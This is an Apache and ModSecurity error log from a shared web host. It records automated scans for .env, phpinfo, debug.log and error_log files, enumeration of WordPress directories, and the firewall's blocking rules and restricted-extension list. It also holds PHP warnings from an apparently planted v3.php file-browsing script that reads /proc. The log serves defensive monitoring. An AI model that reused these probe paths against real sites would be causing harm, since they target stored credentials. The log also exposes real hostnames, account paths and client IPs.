[Tue May 12 03:28:31.159435 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.165:34218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.maelbailly.fr"] [uri "/api/.env"] [unique_id "agKCP9VI9ymHBxup74-V_AAAAJU"], referer: https://maelbailly.fr/api/.env
[Tue May 12 03:28:31.159664 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.165:34218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.maelbailly.fr"] [uri "/api/.env"] [unique_id "agKCP9VI9ymHBxup74-V_AAAAJU"], referer: https://maelbailly.fr/api/.env
[Tue May 12 03:28:32.104403 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.165:34218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.maelbailly.fr"] [uri "/index.php"] [unique_id "agKCP9VI9ymHBxup74-V_AAAAJU"], referer: https://maelbailly.fr/api/.env
[Tue May 12 03:28:32.228962 2026] [security2:error] [pid 1691274:tid 1691287] [client 93.123.109.165:34244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/api/.env"] [unique_id "agKCQFfdQaraX_prmqcqSQAAAAo"]
[Tue May 12 03:28:32.229243 2026] [security2:error] [pid 1691274:tid 1691287] [client 93.123.109.165:34244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/api/.env"] [unique_id "agKCQFfdQaraX_prmqcqSQAAAAo"]
[Tue May 12 03:28:33.149871 2026] [security2:error] [pid 1691274:tid 1691287] [client 93.123.109.165:34244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCQFfdQaraX_prmqcqSQAAAAo"]
[Tue May 12 03:28:34.216414 2026] [:error] [pid 1695975:tid 1695979] [client 164.92.212.216:41336] File does not exist: /home/cpcentre/public_html/phpinfo.php
[Tue May 12 03:28:34.218341 2026] [:error] [pid 1709071:tid 1709094] [client 164.92.212.216:41338] File does not exist: /home/cpcentre/public_html/info.php
[Tue May 12 03:28:34.254869 2026] [security2:error] [pid 1707624:tid 1707682] [client 164.92.212.216:41400] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cpc-entreprises.com"] [uri "/wp-content/debug.log"] [unique_id "agKCQrOxS7i6i_mT2NLTEwAAAEA"]
[Tue May 12 03:28:34.255196 2026] [security2:error] [pid 1707624:tid 1707682] [client 164.92.212.216:41400] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "cpc-entreprises.com"] [uri "/wp-content/debug.log"] [unique_id "agKCQrOxS7i6i_mT2NLTEwAAAEA"]
[Tue May 12 03:28:34.255447 2026] [security2:error] [pid 1707624:tid 1707682] [client 164.92.212.216:41400] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "cpc-entreprises.com"] [uri "/wp-content/debug.log"] [unique_id "agKCQrOxS7i6i_mT2NLTEwAAAEA"]
[Tue May 12 03:28:34.260506 2026] [authz_core:error] [pid 1691274:tid 1691277] [client 164.92.212.216:41410] AH01630: client denied by server configuration: /home/cpcentre/public_html/error_log
[Tue May 12 03:28:37.935855 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:28:38.902200 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/audio/
[Tue May 12 03:28:42.425651 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:28:43.389964 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/css/colors/sunrise/
[Tue May 12 03:29:11.772123 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/group/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:29:12.749370 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/group/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/group/
[Tue May 12 03:29:15.143831 2026] [authz_core:error] [pid 1695975:tid 1695993] [client 185.217.125.16:53293] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/ID3/error_log, referer: binance.com
[Tue May 12 03:29:21.815319 2026] [authz_core:error] [pid 1730175:tid 1730188] [client 185.217.125.16:64678] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/ID3/error_log, referer: binance.com
[Tue May 12 03:29:23.248808 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/widget-group/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:29:24.183816 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/widget-group/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/widget-group/
[Tue May 12 03:29:27.638391 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/2025/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:29:28.527280 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/2025/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-content/uploads/2025/
[Tue May 12 03:29:30.357033 2026] [authz_core:error] [pid 1691274:tid 1691291] [client 185.217.125.16:54816] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/IXR/error_log, referer: binance.com
[Tue May 12 03:29:32.116782 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/post-content/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:29:33.016007 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/post-content/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/post-content/
[Tue May 12 03:29:34.337389 2026] [proxy_fcgi:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:29:37.089255 2026] [authz_core:error] [pid 1707624:tid 1707690] [client 185.217.125.16:56379] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/IXR/error_log, referer: binance.com
[Tue May 12 03:29:38.987631 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/sodium_compat/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:29:39.865298 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/sodium_compat/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/sodium_compat/
[Tue May 12 03:29:43.393486 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/post-terms/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:29:44.299243 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/post-terms/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/post-terms/
[Tue May 12 03:29:47.793973 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/legacy-widget/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:29:48.689695 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/legacy-widget/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/legacy-widget/
[Tue May 12 03:29:52.344189 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/images/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:29:53.287265 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/images/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/images/
[Tue May 12 03:29:54.616066 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/navigation-submenu/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:29:55.512083 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/navigation-submenu/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/navigation-submenu/
PHP Warning:  filesize(): stat failed for /proc/328/task/328/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/328/task/328/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/328/task/328/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/328/task/328/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/328/task/328/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/328/task/328/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:29:59.125400 2026] [proxy_fcgi:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:30:08.196081 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:30:09.091203 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/pomo/
[Tue May 12 03:30:17.204517 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:30:18.106791 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/IXR/
[Tue May 12 03:30:19.392550 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:30:20.302580 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/css/colors/
[Tue May 12 03:30:23.770180 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/paragraph/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:30:24.704832 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/paragraph/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/paragraph/
[Tue May 12 03:30:26.106360 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/query-pagination/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:30:26.983510 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/query-pagination/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/query-pagination/
[Tue May 12 03:30:28.296840 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:30:29.190338 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/images/crystal/
[Tue May 12 03:30:30.636648 2026] [autoindex:error] [pid 1730207:tid 1730231] [client 85.203.21.115:20933] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/mediaelement/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:30:31.562876 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/mediaelement/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/js/mediaelement/
